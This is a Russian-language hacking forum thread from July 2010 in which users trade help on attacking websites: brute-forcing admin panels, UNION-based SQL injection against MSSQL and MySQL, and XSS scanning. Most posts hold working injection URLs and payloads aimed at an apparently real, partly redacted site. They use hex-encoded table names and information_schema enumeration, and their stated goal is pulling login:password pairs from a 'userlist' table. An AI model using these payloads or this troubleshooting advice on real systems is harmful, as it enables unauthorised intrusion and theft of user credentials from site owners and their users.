Старый 28.07.2010, 22:59   #121
BRO
 
Регистрация: 15.07.2010
Сообщений: 49
Репутация: 0
По умолчанию

Лично я использую тулзу от Пашкелы(перебор)- не знаю что может быть лучше. Другие способы поиска админки - роботс.тхт редки, а нагуглить ее через site: еще реже можно.

UPD


Возник вопрос походу инъекции.
При запросе
(SELECT+TOP+1+COLUMN_NAME+FROM+INFORMATION_SCHEMA. COLUMNS+WHERE+TABLE_NAME=(*имя_таблицы в char*))--

Сервер тупо отдает белую страницу. Т.е. вообще ничего не отдает)

Пробовал запросы

(SELECT+TOP+1+COLUMN_NAME+FROM+INFORMATION_SCHEMA. COLUMNS+WHERE+TABLE_NAME='hex')--
(SELECT+TOP+1+COLUMN_NAME+FROM+INFORMATION_SCHEMA. COLUMNS+WHERE+TABLE_NAME='table_name')--

Отвечает с ошибками
Incorrect syntax near '0xzazazaza' и Incorrect syntax near 'table_name' соответственно.

При запросе SELECT+TOP+1+column_name+from+table_name)-- (Когда таблица и колонка существуют)- отдает данные из этой колонки


Как можно обойти или тут без вариантов?
@@version= Microsoft SQL Server 2005 - 9.00.4207.00 (Intel X86)
Спасибо.
BRO вне форума   Ответить с цитированием
Старый 29.07.2010, 10:24   #122
nomad
 
Аватар для nomad
 
Регистрация: 23.07.2010
Сообщений: 179
Репутация: 7
По умолчанию

Цитата:
Сообщение от BRO Посмотреть сообщение
TABLE_NAME='hex')
Возможно, синтаксис на MSSql отличается, но я хекс в кавычки не беру, когда кручу инъекцию на MySql, т.е. для таблицы admin запрос выглядит как
Код:
+where+table_name=0x61646d696e
__________________
Roamer, wanderer
Nomad, vagabond
Call me what you will

(c) Metallica
nomad вне форума   Ответить с цитированием
Старый 30.07.2010, 22:15   #123
Lie to Me
 
Регистрация: 30.07.2010
Сообщений: 5
Репутация: 0
По умолчанию

Нашёл ошибку на сайте, подобрал таблицы всё, при попытке получить данные запросом:

http://www.********/price/index.php?id_parent=1%20union%20select%201,2,3,4,5 ,concat_ws(0x3a,user,pass),7,8,9,10,11,12,13+from+ 0x757365726c697374+limit+0,1--+

либо:
http://www.********/price/index.php?id_parent=1%20union%20select%201,2,3,4,5 ,concat_ws(0x3a,user,pass),7,8,9,10,11,12,13+from+ userlist+limit+0,1--+

либо:
http://******/price/index.php?id_parent=1%20union%20select%201,2,3,4,5 ,concat_ws%28
0x3a,user,pass%29,7,8,9,10,11,12,13 from 0x757365726c697374 0,1--+

получаю ошибку:
Код:
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/****/www/price/price.php on line 52

Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/***/www/price/price.php on line 79
как вытащить данные? при этом все таблицы, колонки выводит, ошибка возникает только при выводе логина и пароля.
то что в таблице userlist есть user,pass точно.
Lie to Me вне форума   Ответить с цитированием
Старый 30.07.2010, 22:44   #124
Gorev
 
Аватар для Gorev
 
Регистрация: 05.07.2010
Сообщений: 70
Репутация: 11
По умолчанию

Цитата:
Сообщение от Lie to Me Посмотреть сообщение
Нашёл ошибку на сайте, подобрал таблицы всё, при попытке получить данные запросом:

http://www.********/price/index.php?id_parent=1%20union%20select%201,2,3,4,5 ,concat_ws(0x3a,user,pass),7,8,9,10,11,12,13+from+ 0x757365726c697374+limit+0,1--+

либо:
http://www.********/price/index.php?id_parent=1%20union%20select%201,2,3,4,5 ,concat_ws(0x3a,user,pass),7,8,9,10,11,12,13+from+ userlist+limit+0,1--+

либо:
http://******/price/index.php?id_parent=1%20union%20select%201,2,3,4,5 ,concat_ws%28
0x3a,user,pass%29,7,8,9,10,11,12,13 from 0x757365726c697374 0,1--+

получаю ошибку:
Код:
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/****/www/price/price.php on line 52

Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/***/www/price/price.php on line 79
как вытащить данные? при этом все таблицы, колонки выводит, ошибка возникает только при выводе логина и пароля.
то что в таблице userlist есть user,pass точно.
Вариантов два
Первый: таблица пустая
Проверяется это элементарно, например так:
union+select+1,2,count(*),4+from+user
count(*) выводит количество записей в таблице, если вывело 0, таблица пустая
либо для 5 ветки так
union+select+1,table_rows+from+information_schema. tables+where+table_name='sasasa'
Второй: Таблица в другой базе.
В базе information_schema хранится информация обо всех таблицах и столбцах из всех баз, и есть вероятность того, что ваша таблица находится не в той базе с которой работает скрипт
Проверяется так(5 ветка)
table_schema+from+information_schema.tables+where+ table_name='user', а база с которой работает скрипт выводится database(). Если базы разные, пробуем обратится к той которая нужна
union+select+1,2,count(*),4+from+base.user "By Jokester"
__________________
Командантe гастарбайтер
Gorev вне форума   Ответить с цитированием
Старый 31.07.2010, 00:26   #125
SulikoshkA
 
Регистрация: 22.07.2010
Сообщений: 5
Репутация: 0
По умолчанию

какими лучше сканнерами искать уязвимости ксс
или все таки ручками намного эффиктивнее
к примеру сканнер пробьет все страницы за раз а человек нет

какой сканер посоветуйте который реально что то находит
спс за внимание)
SulikoshkA вне форума   Ответить с цитированием
Старый 31.07.2010, 01:37   #126
root_sashok
 
Регистрация: 05.07.2010
Сообщений: 44
Репутация: 5
По умолчанию

Если у тебя Firefox, то в нём есть удобный аддон для поиска XSS и пробега множественными типами атак по всем полям сайта / страницы.
root_sashok вне форума   Ответить с цитированием
Старый 31.07.2010, 01:54   #127
Pashkela
 
Аватар для Pashkela
 
Регистрация: 05.07.2010
Сообщений: 1,243
По умолчанию

Цитата:
или все таки ручками намного эффиктивнее
к примеру сканнер пробьет все страницы за раз а человек нет
в том то и дело - круче живого человека никто ничего не пробьет. Пока нет скайнета. Кгб-ы очевидные вещи вроде-бы. Полагаясь на средства автоматизации (любые) - сушите мозг. Имхо.

PS: И результат соответственный. То бишь малоэффективный.
Pashkela вне форума   Ответить с цитированием
Старый 31.07.2010, 02:45   #128
Qwazar
 
Регистрация: 09.07.2010
Сообщений: 376
Репутация: 154
По умолчанию

Сканнер и следов оставит как стадо мамонтов, и найдёт на порядок меньше, чем человек.
__________________
Мой блог: http://qwazar.ru/.
Qwazar вне форума   Ответить с цитированием
Старый 31.07.2010, 03:03   #129
Lie to Me
 
Регистрация: 30.07.2010
Сообщений: 5
Репутация: 0
По умолчанию

Цитата:
Сообщение от Gorev Посмотреть сообщение
Вариантов два
Первый: таблица пустая
Проверяется это элементарно, например так:
union+select+1,2,count(*),4+from+user
count(*) выводит количество записей в таблице, если вывело 0, таблица пустая
либо для 5 ветки так
union+select+1,table_rows+from+information_schema. tables+where+table_name='sasasa'
Второй: Таблица в другой базе.
В базе information_schema хранится информация обо всех таблицах и столбцах из всех баз, и есть вероятность того, что ваша таблица находится не в той базе с которой работает скрипт
Проверяется так(5 ветка)
table_schema+from+information_schema.tables+where+ table_name='user', а база с которой работает скрипт выводится database(). Если базы разные, пробуем обратится к той которая нужна
union+select+1,2,count(*),4+from+base.user "By Jokester"
из первого варианта ( union+select+1,2,count(*),4+from+user ) выводит всё ту же ошибку.
второй если честно не понял, не можешь полный запрос показать с учётом моего урла *интересует
-= Проверяется так(5 ветка)
Цитата:
table_schema+from+information_schema.tables+where+ table_name='user' =-
при таком адресе:
http://*******/price/index.php?id_parent=1%20union%20select%201,2,3,4,5 ,database(),7,8,9,10,11,12,13--+

получаю:
******ru_price

если делать запрос:
http://******/price/index.php?id_parent=1%20union%20select%201,2,3,4,5 ,6,7,8,9,10,11,12,13%20table_schema+from+informati on_schema.tables+where+%20table_name=0x736b7769647 2755f70******--+

то всё нормально, ошибок нет, но при этом и не отображается не одна цифра.

при этом при запросе:
http://******/price/index.php?id_parent=1%20union%20select%201,2,3,4,5 ,6,7,8,9,10,11,12,13%20table_schema+from+informati on_schema.tables+where+%20table_name='****ru_price '--+

всё та же ошибка.

это означает что таблица находится в той базе в которой работает скрипт и если нет, то как посмотреть в какой базе ?.

Спасибо за совет, не скинешь в ПМ жабер, если вдруг не пойму.
Lie to Me вне форума   Ответить с цитированием
Старый 31.07.2010, 04:39   #130
root_sashok
 
Регистрация: 05.07.2010
Сообщений: 44
Репутация: 5
По умолчанию

Цитата:
это означает что таблица находится в той базе в которой работает скрипт и если нет, то как посмотреть в какой базе ?.
information_schema.schemata пробовал смотреть?
root_sashok вне форума   Ответить с цитированием
Ответ

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход



Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2022, Jelsoft Enterprises Ltd. Перевод: zCarot